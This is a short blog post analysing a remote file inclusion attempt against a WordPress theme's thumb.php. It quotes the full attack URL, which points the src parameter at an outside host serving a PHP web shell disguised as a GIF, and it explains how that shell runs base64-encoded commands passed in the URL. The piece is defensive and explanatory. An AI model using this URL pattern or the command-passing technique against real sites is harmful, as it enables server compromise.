0

Random vulnerability disected

Posted February 1st, 2012 in Razno and tagged , by Metod

Recently, I received a 404 notification for the following url:

http://www.metod.si/wp-content/themes/myweblog/thumb.php?src=http://picasa.com.jcibuenosaires.com.ar/2.php

Apparently the myweblog wordpress theme had (maybe still has) a RFI vulnerability.

Fortunately I do not use that theme. But I had to wonder what was inside the “2.php” file. So I downloaded it. 🙂

What was inside?

The file first tries to disguise itself as GIF image – GIF89a. But after the binary data it contains PHP code.

The PHP code is obvious. If you add &lol=1, execute first block. If you add &osc=pZ…AA=, execute second block, otherwise the third.

What does the first block do?

Well nothing special. It just identified the vulnerability and outputs some system information.

Example: v0pCr3wsys:Linux …nob0dyCr3w

Second block is practically the same, except that it accepts commands directly from url.


Just append &osc=some_base64_encoded_command and it will execute it (if possible).

Third block is an editor that tries to upload files, create them etc..

Quite some script. Also this shows that you have to always sanitize user input. That really cannot be stressed enough.